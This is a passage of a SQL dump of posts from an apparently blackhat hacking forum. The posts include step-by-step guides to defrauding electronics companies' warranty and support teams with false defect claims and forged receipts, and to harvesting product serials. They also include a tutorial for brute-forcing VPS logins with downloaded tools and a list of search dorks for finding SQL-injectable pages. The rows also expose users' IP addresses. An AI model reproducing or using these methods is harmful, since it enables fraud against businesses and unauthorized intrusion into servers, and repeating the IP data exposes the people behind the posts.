FREE!\r\n[/size][/color][/b]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7dd6c0858439fa01d06c652ebed21bed', '0', '0'); INSERT INTO mybb_posts VALUES('3643', '716', '0', '16', 'Roku 2 XD', '0', '214', 'Rave™', '1349542540', '[align=center] [color=#32CD32] Requirements:\r\n- Roku 2 XD Serial\r\n- A brain\r\n\r\nStep 1:\r\nGo to Roku\'s support page and live chat. Enter in all your real information. Link: http://support.roku.com/home#\r\n\r\nStep 2:\r\nSay that your Roku is not showing up on the TV, and that you have tried to reset the device, HDMI and RCA, and a new power adapter from a friend and none of those worked. They will ask when you bought the Roku, say a date past a month ago. For example, if today is the 12th of June, say May 20th. If they say to contact Amazon, say you already did and they said to contact Roku since the date is past a month. They will also ask for the serial and the model #. If it\'s a Roku 2 XD, the model# is: 3050R.\r\n\r\nStep 3:\r\nThey will ship out another Roku. Keep the Roku 2 XD and enjoy. \r\n\r\nBtw, they won\'t even bother asking for it back really. Their replacement team is lazy as fuck. [/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '12741f1b0620e4e3628d8ded814ec0a2', '0', '0'); INSERT INTO mybb_posts VALUES('3644', '717', '0', '12', 'How to Bruteforce VPS!', '0', '214', 'Rave™', '1349542596', '[align=center][color=#32CD32][size=large] How to BruteForce a VPS! [/align] [/size][/color]\r\n\r\n\r\n[size=medium] \r\nHey guys, This is my first tutorial so.. Hope you guys like it. :D\r\n\r\n[color=#FF4500] [size=xx-large] 1) [/size] [/color]Alright first off your going to need to download DU Brute, And VNC Scanner. \r\nLink: [/size] [url=http://www.mediafire.com/?5kfe8qg0s7qazsl]CLICK ME![/url]\r\n\r\n[size=medium] [color=#FF4500] [size=xx-large] 2) [/size] [/color] After you have those downloaded your going to have to go into the \r\nVNC Scanner folder and open \"vnc_scanner_gui.exe\" Its the one all the way at the bottom. Once you have that opened it should look like this\r\n\r\n[img]http://i.imgur.com/DmjVP.png[/img]\r\n\r\n[color=#FF4500] [size=xx-large] 3) [/size] [/color]Now your going to need to go to get some proxies.\r\nAfter you have some, just copy the proxies and paste them in the VNC Scanner. Then press \"Start Scan\"\r\n\r\n[img]http://i.imgur.com/eJjha.png[/img]\r\n\r\n\r\n[color=#FF4500] [size=xx-large] 4) [/size] [/color] Once you have clicked \"Start Scan\" a cmd window will come up and just let it do its thing. After its done you should see the \"Start Scan\" Button fading in and out. When you see it fading in and out, You have to press \"Save List\" and save it to desktop.\r\n\r\n[color=#FF4500] [size=xx-large] 4) [/size] [/color] Now open the DU Brute folder and open DU Brute.exe. Once you have opened it click \"Generation\"\r\n\r\n\r\n[img]http://i.imgur.com/uAwaV.png[/img]\r\n\r\n\r\n[color=#FF4500] [size=xx-large] 5) [/size] [/color] Once you have clicked Generation, click \"File IP\" and pick the IP list you saved to your desktop. Then click on \"File Login\" and go to the DUBrute folder and click on \"usernames\" Now after you have that done go to \"File Pass\" and open the \"Passwords\" Folder that is in the DUBrute folder, And pick one of the password lists.\r\n\r\n\r\n[img]http://i.imgur.com/4fk6P.png[/img]\r\n\r\n\r\n[color=#FF4500] [size=xx-large] 6) [/size] [/color] After you have done that, Press \"Make\" and then it should be finished pretty fast then press \"Ok\" in the new windows that pops up.\r\n\r\nNow just exit out of \"Generation\" and press \"start\" on DU Brute.\r\n\r\n\r\n[img]http://i.imgur.com/4fk6P.png[/img]\r\n\r\n \r\n[color=#FF4500] [size=xx-large] 7) [/size] [/color] [/size] [size=medium] Then this is the long part, You just need to wait for it to do its thing. This may take a shitwhile but at the end you could have a list of VPS logins. Anyways, Hope this helps and hope you guys get some VPS\'s and If you need help with anything please PM me or post on this thread! [/size]', '71.67.179.16', '1195619088', '1', '0', '1', '1350003093', '1', 'e378ab6e266c10ed25eccda6aa49d751', '0', '1350003093'); INSERT INTO mybb_posts VALUES('4284', '782', '4243', '7', 'RE: We need to advertise!', '0', '1', 't3h jok3r', '1350003167', '[quote=\'R?????zo?\' pid=\'4243\' dateline=\'1349959657\']\r\nwe have been banned from google so the only thing we can do is refer members.\r\n[/quote]\r\n\r\nI announced in the the chat and on Twitter that we have been unbanned.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '12f7b660480346b09e94c999a2193fc4', '0', '0'); INSERT INTO mybb_posts VALUES('3645', '718', '0', '16', 'Apple Cookie Case', '0', '214', 'Rave™', '1349542676', '[align=center] [color=#FFA500] I managed this pretty easily a couple of days ago with just a few emails.\r\nThe case is pretty nice, check it out at Cookiecase- Premium case for the iPod Touch 4g\r\n\r\n\r\nEmail them at cookiecatllc@gmail.com with an excuse about why the case is shit. Be imaginative.\r\nIf they ask for an order number, say someone bought it for you as a present.\r\nIf they ask for an order number off that person, say they got it from eBay or something.\r\nThey should send you a replacement case.[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'deb101c95cb4d1d33e6958fdebaa5dff', '0', '0'); INSERT INTO mybb_posts VALUES('3646', '719', '0', '16', 'AstroPID Clean', '0', '214', 'Rave™', '1349542721', '[align=center] [size=large] [color=#32CD32] \r\nDownload link: http://www.mediafire.com/?mnzx7haqo53cgy0\r\n\r\nScan: https://www.virustotal.com/file/4bf38f9c2fdda335861feb3a3d11b39ebbc3d7ca71be726f977bd7ab46027b5f/analysis/\r\n\r\n\r\nIts clean, I use this.\r\n[/color][/size][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '98857f6af5d1fcdfcc60b65af79a6883', '0', '0'); INSERT INTO mybb_posts VALUES('3647', '720', '0', '16', 'How to find Serial/PID', '0', '214', 'Rave™', '1349542771', '[align=center] [color=#FF0000] \r\n1) First, lets go on a site that most people visit every day. YouTube.com. \r\n2) Once we\'ve decided on the product, we can go and search for a serial. \r\nFor example, if I wanted a Samsung BX2450 24\" monitor, I\'d search \"Samsung BX2450 unbox\"\r\n3)Now filter your searches to only HD video, or as high resolution as possible.\r\n4)Go through the video, and find the spot where it shows the back, or the serial area, and pause the video. \r\n5) Write down the Serial number, the details, videoID, and take a screenshot for future reference\r\n6) SE and enjoy!\r\n\r\nSearch dork: \"%productname% unboxing\" or \"%productname% unbox\"\r\nTry \'tigerdirectblog\', they unbox a lot of stuff\r\nThis will also work to get an IMEI and corresponding serial for phones\r\n\r\nOR\r\n\r\nAnother Method:\r\n1) Go on Ebay or CL\r\n2) Find said product\r\n3) Say that you have bought a fake item on the site before, and you don\'t want to get ripped off again, so you are asking for the serial so that you can confirm it\'s real\r\n\r\n[img]http://i.imgur.com/huOWW.png[/img] [/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '44b802437a6fde26e58b1d7c0feb523c', '0', '0'); INSERT INTO mybb_posts VALUES('3648', '721', '0', '16', 'Microphone', '0', '214', 'Rave™', '1349542822', '[align=center] [color=#00BFFF] Hello everyone. I decided I would make a revamped tutorial today on the Blue Yeti Microphone. The old one posted by Bobrichards does not work very well. So this is my revamped tut. \r\n\r\nStill giving Bobrichards credit for finding out they were SEable!\r\n\r\nPlease note you will need the following:\r\n\r\nPhotoshop\r\nA Brain\r\n\r\nThis is a long tut! If you do not have the required items you can not do this tut. A brain is vital for this tutorial. I pretty much breast fed you guys here but I can imagine someone PMing me saying \"make me a shipping receipt bro\". I did this all within a day and it got shipped out the next day!\r\n\r\nLets get on with the tut.\r\n\r\nSteps:\r\n\r\n1. Head over to http://www.bluemic.com/salesandsupport/s...equest.php (May be different if not in US)\r\n\r\n2. Fill out the information and say something along the lines of \"The microphone will not work. It is not being detected by my computer. I even tried it on several other computers including a mac, a laptop, and my dads desktop\"\r\n\r\n3. They will go over some troubleshooting steps and just say \"Nothing is working\"\r\n\r\n4. They will ask to setup an RMA. Tell them that you need it in a hurry like \"I do a lot of youtube reviews with this beautiful microphone to keep my viewers happy with the sound quality. I would be really happy if I could get the microphone asap!\"\r\n\r\n5. They will say something like. \"Ok we can do cross shipping, what that means is that you ship it to us then when you get a tracking number send that to us and we can send you out a new one!\"\r\n\r\n6. Say something like \"Ok great! I will ship it out tomorrow!\" P.S Make sure the day you are going to ship it out is not sunday or saturday lol.\r\n\r\n7. Look in the email they sent or their website for a RMA address\r\n\r\n8. This is where photoshop is involved. Download my shipping template here: http://www.mediafire.com/?cdq49f6pwcqlyka\r\n\r\n9. Now open up the template and edit the setting to your liking. This is where you need some knowledge. You need to edit dates and cites and everything. Make sure it looks legit as possible. I cannot really show you exactly what to do considering I do not have photoshop installed. I just got a new computer for xmas and have to redownload everything.\r\n\r\n10. To calculate shipping go here http://postcalc.usps.gov/ \r\n\r\n11. It is a lot of work ik but now you need to get the shipping dimensions and estimate the weight of the box. From amazon it says this:\r\n\r\nProduct Dimensions: 5 x 5.5 x 10 inches ; 3.5 pounds\r\nShipping Weight: 5.2 pounds\r\n\r\n12. Edit the receipt so the weight is around 5.3 pounds\r\n\r\n13. Use the shipping calculator to calculate the cost of the shipping.\r\n\r\n14. After everything is done, download GIMP 2 and use the blur tool to blur out the receipt to make it a little more legit.\r\n\r\n15. Save the photo and upload it to photobucket or just screen cap it with speedcap.\r\n\r\n16. Email them back saying something like I did: \"Hello! I shipped the item out today but the shipping was around ____ *(enter your shipping cost here)*, I am on a tight budget for my wifes birthday so I need to save as much money as possible. I am so sorry but I did not get a tracking number. Is it possible I can still get the microphone?\"\r\n\r\n17. They should say \"No problem! We understand the situation you are in. Can you please send us a receipt to verify that you shipped it out?\"\r\n\r\n18. Play dumb and say \"Sure I have this old scanner and I can upload the receipt. *Attach pic to email*\r\n\r\n19. They should say everything is fine and they will ship out your brand new Yeti.[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '065dc368bda8843fd0297bf7f00e02ec', '0', '0'); INSERT INTO mybb_posts VALUES('3649', '722', '0', '16', 'Plantronics GameCom 780 Surround Sound Gaming Headset', '0', '214', 'Rave™', '1349542879', '[align=center] [color=#32CD32] Hello Everyone This Is My First Post On This Forum!\r\n\r\n\r\n\r\n1.Go to your email and send email to plantronics (You Can Find Their Email From Their Site) Say That You Got Those Headphones From Your Aunt As Birthday Present And They Have Been Great Headphones But Now Suddenly They Stopped Working After 2 Weeks I Thought That Something Was Wrong With My PC I Tried Them Also With My Other PC And Reinstalled Drivers But it Didnt Helped. Before This They Worked Perfectly And Sound Was So Clean But Im Little Bit Dissapointed Now. ( My Story EDIT IT Little Bit)\r\n\r\n2. They Will Answer Asking Something Like This : Please check if the headset is recognized as a an audio device in Control Panel.\r\nAlso try to install the headset in a different USB port. Is there any error message?\r\n\r\n3.Say that you tried and there is no any error message\r\n\r\n4.Then they will Told You Do Replacement They Give Site Where You Fill All Info.\r\n\r\n5. Success Now Just Wait And When Your Gaming Headset Arrives There Will Be Paper Saying Please Send Broken One Back To Plantronics just fuck it.[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '229fbf32eb9062bfe40dbd87b51fc777', '0', '0'); INSERT INTO mybb_posts VALUES('3650', '723', '0', '16', 'iFrogs', '0', '214', 'Rave™', '1349542930', '[align=center] [color=#FFA500]\r\nHello!\r\nHere you will learn how to social engineer iFrogz for free products. Note that I have embedded in here a specific number, if I find this leaked, I can get the number from it. If it matches your number, things wont be pretty…this wont make you hundreds of dollars but is good for beginners.\r\n\r\nRequirements\r\nCreativity\r\nFake receipt/Photo (I can provide for black/white earbuds)\r\nPatience\r\n\r\n\r\n\r\n1. Go to the iFrogz website at: http://www.ifrogz.com\r\n2. Find the desired product, in this tut we will use iFrogz Plugz with Mic\r\n3. Find “Contact Us” and fill out the required information.\r\n4. For the complaint, we will want to be polite and respectful, for headphones/earbuds, a good defect is no sound coming out of an earbud/cup. Here is a good complaint, do not copy word for word or it will get saturated. READ STEP 5 BEFORE SUBMITTING!\r\n\r\nHello, thank you for taking time to view my submission. Recently I have purchased a (product here) as I have heard nothing but great feedback! However, upon using the items I noticed (defect here). As you can tell, this is disappointing because I thought I could rely on them. Thank you again for the time, I will be greatly anticipating a reply.\r\n\r\n5. There are a few ways to do this. You can say you got them as a gift, you can say that you bought them. I said I got them for my birthday to avoid having to show a receipt. However, if you say you purchased them, you can make a fake receipt (or have someone else make you one).\r\n6. They will email you back asking to send the product in, now we got to be creative. I told them I am HIV+ and I got blood on it when I got a paper cut, that would make it illegal to send, be creative though don’t use the same thing I used or it will get saturated quickly…\r\n7. They will reply asking for a receipt, I’m pretty sure you NEED this in order to actually get it, but use a fake receipt made at http://www.customreceipt.com, make sure the info on the receipt at least looks legit. Attach the receipt to the email (if you said you got s a gift, tell them whoever got you it found the receipt).\r\n8. They will ask for two things after this, shipping info, and the product name/color.\r\n9. You will receive the product within 10 business days! (I got mine in 1 day[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'a4023087128ca97846263f80c4ba2797', '0', '0'); INSERT INTO mybb_posts VALUES('3651', '724', '0', '74', 'Cheese Cake Client', '0', '214', 'Rave™', '1349543370', '[b] Enjoy![/b]\r\nhttp://www.mediafire.com/?wxt82vm5ag3xgg5', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '2de87dde347a9a459327bd8bcc926d3b', '0', '0'); INSERT INTO mybb_posts VALUES('3652', '725', '0', '7', 'L33THacking Cloudflare Resolver!', '0', '214', 'Rave™', '1349543426', '[align=center] [color=#98FB98] [size=x-large] Enjoy!\r\n\r\nhttp://kasual.ulmb.com/[/align] \r\n [/size][/color]', '71.67.179.16', '1195619088', '1', '0', '214', '1349543463', '1', 'ebd4bd777725086cfc3fe5f6d2c074b2', '0', '1349543463'); INSERT INTO mybb_posts VALUES('3653', '726', '0', '13', 'Dorks', '0', '214', 'Rave™', '1349543495', 'Hey guys ENJOY\r\n\r\n[spoiler]\r\n[quote]\r\ninurl:index.php?id=\r\ninurl:trainers.php?id=\r\ninurl:buy.php?category=\r\ninurl:article.php?ID=\r\ninurl:play_old.php?id=\r\ninurl:declaration_more.php?decl_id=\r\ninurl:pageid=\r\ninurl:games.php?id=\r\ninurl:page.php?file=\r\ninurl:newsDetail.php?id=\r\ninurl:gallery.php?id=\r\ninurl:article.php?id=\r\ninurl:show.php?id=\r\ninurl:staff_id=\r\ninurl:newsitem.php?num=\r\ninurl:readnews.php?id=\r\ninurl:top10.php?cat=\r\ninurl:historialeer.php?num=\r\ninurl:reagir.php?num=\r\ninurl:Stray-Questions-View.php?num=\r\ninurl:forum_bds.php?num=\r\ninurl:game.php?id=\r\ninurl:view_product.php?id=\r\ninurl:newsone.php?id=\r\ninurl:sw_comment.php?id=\r\ninurl:news.php?id=\r\ninurl:avd_start.php?avd=\r\ninurl:event.php?id=\r\ninurl:product-item.php?id=\r\ninurl:sql.php?id=\r\ninurl:news_view.php?id=\r\ninurl:select_biblio.php?id=\r\ninurl:humor.php?id=\r\ninurl:aboutbook.php?id=\r\ninurl:ogl_inet.php?ogl_id=\r\ninurl:fiche_spectacle.php?id=\r\ninurl:communique_detail.php?id=\r\ninurl:sem.php3?id=\r\ninurl:kategorie.php4?id=\r\ninurl:news.php?id=\r\ninurl:index.php?id=\r\ninurl:faq2.php?id=\r\ninurl:show_an.php?id=\r\ninurl:preview.php?id=\r\ninurl:loadpsb.php?id=\r\ninurl:opinions.php?id=\r\ninurl:spr.php?id=\r\ninurl:pages.php?id=\r\ninurl:announce.php?id=\r\ninurl:clanek.php4?id=\r\ninurl:participant.php?id=\r\ninurl:download.php?id=\r\ninurl:main.php?id=\r\ninurl:review.php?id=\r\ninurl:chappies.php?id=\r\ninurl:read.php?id=\r\ninurl:prod_detail.php?id=\r\ninurl:viewphoto.php?id=\r\ninurl:article.php?id=\r\ninurl:person.php?id=\r\ninurl:productinfo.php?id=\r\ninurl:showimg.php?id=\r\ninurl:view.php?id=\r\ninurl:website.php?id=\r\ninurl:hosting_info.php?id=\r\ninurl:gallery.php?id=\r\ninurl:rub.php?idr=\r\ninurl:view_faq.php?id=\r\ninurl:artikelinfo.php?id=\r\ninurl:detail.php?ID=\r\ninurl:index.php?=\r\ninurl:profile_view.php?id=\r\ninurl:category.php?id=\r\ninurl:publications.php?id=\r\ninurl:fellows.php?id=\r\ninurl:downloads_info.php?id=\r\ninurl:prod_info.php?id=\r\ninurl:shop.php?do=part&id=\r\ninurl:productinfo.php?id=\r\ninurl:collectionitem.php?id=\r\ninurl:band_info.php?id=\r\ninurl:product.php?id=\r\ninurl:releases.php?id=\r\ninurl:ray.php?id=\r\ninurl:produit.php?id=\r\ninurl:pop.php?id=\r\ninurl:shopping.php?id=\r\ninurl:productdetail.php?id=\r\ninurl:post.php?id=\r\n[/quote]\r\n[/spoiler]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '3c345a776b4fea32b17a8e78634ec2fe', '0', '0'); INSERT INTO mybb_posts VALUES('3654', '727', '0', '35', 'Rate My Thread Design + Download', '0', '214', 'Rave™', '1349543534', '[b]Hey Guys, I just finished my first thread design. Constructive Critisicm is accepted. Don\'t troll please.[/b]\r\n\r\nPreview:\r\n[spoiler]\r\n[img]http://i.imgur.com/5z8wf.png[/img]\r\n[/spoiler]\r\n\r\nDOWNLOAD:\r\n[url=http://www.mediafire.com/?z38x1423nkkqn3c]Nice Job Kasual[/url]', '71.67.179.16', '1195619088', '1', '0', '214', '1349543919', '1', 'f34214ebb8264e05efc1130c84f4d493', '0', '1349543919'); INSERT INTO mybb_posts VALUES('3655', '728', '0', '8', '[Sick Heavy] My first Dubstep Album [Sick Heavy]', '0', '214', 'Rave™', '1349543956', '[b] [color=#0000CD]Hey guys this is my first dubstep album[/b]\r\n\r\n\r\nDOWNLOAD: [url=http://www.mediafire.com/?sq218m6u88vz254]CLICK ME IF YOU LIKE GIRLS[/url][/color]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '02d21027c61661555b5edb7ef5ef56c5', '0', '0'); INSERT INTO mybb_posts VALUES('3656', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '3', '??????????¢™', '1349545785', 'Nice, Great giveaway you got here.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '01383c97798c96fca3a9c08530be2cef', '0', '0'); INSERT INTO mybb_posts VALUES('3657', '729', '0', '7', 'Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349545873', 'Hey guys, I know this isn\'t really the right place to put this but i just want to spread the word around.\r\nThere is a new virus that is going around on skype right now.\r\nWhat it does is once you click the link it sends the link to all your friends in skype.\r\nIt also installs a backdoor into your computer, And keyloggers and other files.\r\nIt blocks deletion of the virus, Cmd and taskman.\r\nThis thing spreads like wild fire, I already have 30 friends infected with it.\r\n\r\nThe virus will send a mass message like this\r\n[quote]lol is this your new profile pic? (Link)img=Your Skype Username[/quote]\r\n\r\nDo not click the link, The only known way to remove this as of now is to find it (which is pretty hard considering that it remakes the virus and binds it to everything in sys32)\r\nOr find an anti virus that it hasn\'t blocked that will pick it up.\r\n\r\nIf you see someone sending the links i would advise to remove them.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '454e62dac4b940a23d7f8749b561f5a3', '0', '0'); INSERT INTO mybb_posts VALUES('3659', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '82', 'iTzIpod', '1349547005', 'Lool. Seems legit. :p \n\n\nBut anyways good luck!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9879cd512750602d28aaf3de26648953', '0', '0'); INSERT INTO mybb_posts VALUES('3660', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '82', 'iTzIpod', '1349547054', 'I also drink Coke, Iced Tea, Arizona, and sometimes, Fruitopia', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8901a5fce1c60fc46a376894268a1325', '0', '0'); INSERT INTO mybb_posts VALUES('3661', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349547090', 'Yeah . Lets hope so. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e696ae798306038aac8040aed80efa7e', '0', '0'); INSERT INTO mybb_posts VALUES('3664', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1349547225', 'Alright. I don\'t remember closing any threads lately. But oh well. :p I have a short memory.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '53d374fe5c10e38af40890311216873d', '0', '0'); INSERT INTO mybb_posts VALUES('3665', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349547257', 'Anyways, hope your group gets approved! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '588fb0bb0d42e2b908e4d5001c90b56f', '0', '0'); INSERT INTO mybb_posts VALUES('3666', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349547291', '/me is really bored right now. And doesn\'t know what to do.. Might play some CoD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3284decb53846d4fba3f6fbd92764492', '0', '0'); INSERT INTO mybb_posts VALUES('3667', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349547322', 'Banned because you\'re a flamingworm', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aea68bc7bc40452d7e560d8cb5b1bf1e', '0', '0'); INSERT INTO mybb_posts VALUES('3668', '691', '3517', '3', 'RE: Gaming Section Released', '0', '82', 'iTzIpod', '1349547355', 'Meh. Gonna wait for Black Ops 2 :D Hell yeah. \n\nBlack Ops & Black Ops 2 <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd9bf45b8685525e00a2c109b9093b0ea', '0', '0'); INSERT INTO mybb_posts VALUES('3669', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1349547400', 'No you don\'t. I win. So I get a cookie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '317058cc77534a4dd08ebee67c90f881', '0', '0'); INSERT INTO mybb_posts VALUES('3670', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1349547437', 'I got a bunch of Minecraft Accounts.\n\nJust got a bunch from a list of my friend\'s.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00bbdab915ab8946a13acf037a364ecf', '0', '0'); INSERT INTO mybb_posts VALUES('3671', '706', '3633', '4', 'RE: Supppp', '0', '82', 'iTzIpod', '1349547475', 'Welcome to L33tHacking dude. \n\n\nEnjoy your stay! \n\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9f121c3b6f61418cc5e589bc7598e922', '0', '0'); INSERT INTO mybb_posts VALUES('3672', '706', '3633', '4', 'RE: Supppp', '0', '1', 't3h jok3r', '1349547500', 'Welcome to L33THacking. Nice introduction especially the girls in your signature ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'de176a86a5b136c83031cb77bd49f779', '0', '0'); INSERT INTO mybb_posts VALUES('3673', '707', '3634', '13', 'RE: How to migrate CRACKED minecraft accounts!', '0', '82', 'iTzIpod', '1349547508', 'I saw this a couple hours ago earlier today.\n\nBut, nice share! :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1ac51971e6ba700977135d647d26d847', '0', '0'); INSERT INTO mybb_posts VALUES('3674', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '82', 'iTzIpod', '1349547542', 'Looks nice! I will download this after I come home.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '898fb972b5ac6b38c5e43324ffa6d8fc', '0', '0'); INSERT INTO mybb_posts VALUES('3675', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '82', 'iTzIpod', '1349547576', 'Don\'t know how to use this. Can you teach me? :/\n\nNice share.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cbe8a7a07f44316c20a2880878438f26', '0', '0'); INSERT INTO mybb_posts VALUES('3676', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '1', 't3h jok3r', '1349547940', 'What is a cheese cake client?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '40c7650608dc1f202d06794d16eb0cb4', '0', '0'); INSERT INTO mybb_posts VALUES('3677', '730', '0', '72', 'Need for Speed Most Wanted limited edition', '0', '1', 't3h jok3r', '1349548040', 'Who\'s planning on buying Need for Speed Most Wanted limited edition?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '284fa27b3b463aadc44e3f71896c58e6', '0', '0'); INSERT INTO mybb_posts VALUES('3678', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1349548100', 'I knew about this earlier today. But I didn\'t click on any. Hopefully I don\'t get infected. Not going to be downloading or clicking any links on Skype\nJust for safety reasons.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50cb65ea6862d4287ea500ffe48a4560', '0', '0'); INSERT INTO mybb_posts VALUES('3679', '730', '3677', '72', 'RE: Need for Speed Most Wanted limited edition', '0', '82', 'iTzIpod', '1349548220', 'Not me. I\'m not really into Need For Speed', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ffb04609205cd14f735f1fc54a1c7ada', '0', '0'); INSERT INTO mybb_posts VALUES('3734', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349585832', 'Sure, we would are always looking forward for great new changes. I was planning to center the logo but I don\'t know such a simple task is taking so long. I was also banning to add a background picture, behind (DUH) the logo.', '72.231.24.165', '1223104677', '1', '0', '1', '1349586384', '1', '43aae80a6f7b256d137599866987c040', '0', '1349586384'); INSERT INTO mybb_posts VALUES('3682', '446', '3599', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1349548786', '[quote=\'flamingworm\' pid=\'3576\' dateline=\'1349498504\']\r\nNo No No....like what is your advertising strategy. How are you getting the word out about l33thacking.net?\r\n[/quote]\r\n\r\nBasically advertise on forums like h@ckforums because we have many more blackhat forums that HF doesn\'t have and a lot of hackers want to learn more advanced hacking, get serials, social engineering, want movie rips etc and we allow such discussion but HF doesn\'t so we can easily attract HF members. So basically the plan is that we need to offer HQ members that are interested in more advanced hacking and we also try to keep the skiddiness down.\r\n\r\n[quote=\'iTzIpod\' pid=\'3599\' dateline=\'1349523643\']\r\nCan we use traffic bots on LH?\r\n[/quote]\r\n\r\nNice idea but I want real traffic only so that\'s why I haven\'t used any traffic bots yet.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec6757bd4ad3ee18fb75523dec045f8f', '0', '0'); INSERT INTO mybb_posts VALUES('3683', '729', '3678', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349549889', '[quote=\'iTzIpod\' pid=\'3678\' dateline=\'1349548100\']\r\nI knew about this earlier today. But I didn\'t click on any. Hopefully I don\'t get infected. Not going to be downloading or clicking any links on Skype\r\nJust for safety reasons.\r\n[/quote]\r\n\r\nYea man just be careful, I am just warning everyone.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '89b014c9afa7d79179c510e48de44061', '0', '0'); INSERT INTO mybb_posts VALUES('3684', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '225', 'Graycat', '1349550025', 'sounds like somthing i would do', '75.162.63.63', '1268924223', '0', '0', '0', '0', '1', '999a33931ccb3c18d8064ee55ffb8546', '0', '0'); INSERT INTO mybb_posts VALUES('3685', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '222', 'Exposé', '1349550077', 'It\'s decent but not the best. I think u should make like a bg template and then put all of these items inside it if u know what I mean', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'd893a4b10c92b5757f3aa43ace91eda7', '0', '0'); INSERT INTO mybb_posts VALUES('3686', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349550283', 'Haha yeh let\'s hope so....', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'f77aa3bfb9681ccc955eb33aef406b2a', '0', '0'); INSERT INTO mybb_posts VALUES('3687', '706', '3633', '4', 'RE: Supppp', '0', '222', 'Exposé', '1349550411', 'Wouldn\'t that be awesome if those girls were actually lesbians haha...\n\nOn subject welcome to LH and enjoy your stay', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '85f09779075ad3d2807e223bb60b7b88', '0', '0'); INSERT INTO mybb_posts VALUES('3688', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '225', 'Graycat', '1349551597', 'seems like a fun task to do with a open wifi hotspot for the neighbors stealing wifi.', '75.162.63.63', '1268924223', '0', '0', '0', '0', '1', '7311c5bb2f486598e4e9ac7e9c4673a8', '0', '0'); INSERT INTO mybb_posts VALUES('3690', '679', '3449', '4', 'RE: flamingworm here!', '0', '9', 'p420', '1349552170', 'I spelt it as \"cum\" because i wanted to give people a laugh.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bd6211e0b84ff3f16e29ea007d9db3b6', '0', '0'); INSERT INTO mybb_posts VALUES('3691', '691', '3517', '3', 'RE: Gaming Section Released', '0', '9', 'p420', '1349552212', 'Nice updates. Thanks for adding the new forums. When is Marketplace coming back?', '72.231.24.165', '1223104677', '0', '0', '9', '1349552221', '1', '0d53498c928977cbfe251789a355b4a9', '0', '1349552221'); INSERT INTO mybb_posts VALUES('3692', '680', '3457', '35', 'RE: Some of my works...', '0', '9', 'p420', '1349552258', 'Looks broken to me too. I think it got removed.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f4202014fb2a6d051f5f42e35089333f', '0', '0'); INSERT INTO mybb_posts VALUES('3693', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '9', 'p420', '1349552431', 'I don\'t think it would get approved because there\'s no real purpose of the group. EX: Coders will help new coders, Unique helps keep LH a active site etc.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8b8fbc2b6eaccf8e8087f96e23af57f7', '0', 